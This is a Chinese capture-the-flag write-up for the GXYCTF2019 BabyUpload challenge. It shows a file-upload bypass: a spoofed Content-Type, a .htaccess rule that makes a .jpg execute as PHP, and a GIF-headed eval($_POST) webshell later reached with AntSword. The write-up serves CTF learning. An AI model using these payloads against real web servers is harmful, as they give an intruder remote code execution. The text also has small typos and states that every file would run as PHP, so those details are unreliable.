BUUCTF | [[GXYCTF2019]BabyUpload

知识点

文件类型绕过👇

Content-Type: image/jpeg

apache环境下上传.hatcess

首先上传一个.htaccess内容如下的文件

<FilesMatch "shell2.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

这样所有文件都会解析为php，然后再上传图片马，就可以解析

这里上传一个php文件试一下发现文件名后缀不能是 ph 开头，文件内容过滤<?
修改代码然后上传内容如下👇

GIF89a?
<script language="php">eval($_POST['lx']);</script>

解题

bp抓包上传.htaccess文件修改Content-Type为image/ipeg点击Forward上传成功

 

然后在上传shell2.jpg文件Forwark得到地址

最后测试完用蚁剑连接得到flag

这里说一下如果蚁剑添加数据错误的解决思路👇
1、检查前后端的文件上传是否有文件名限制
2、如果文件名有限制则通过burpsuite抓包修改文件名上传
3、上传成功后在用蚁剑或者菜刀进行webshell连接。

错误出在了哪里呢，经过求教群友和反思，错误应该在上传的文件中的php代码语法出错去网上搜索一份正确的代码即可！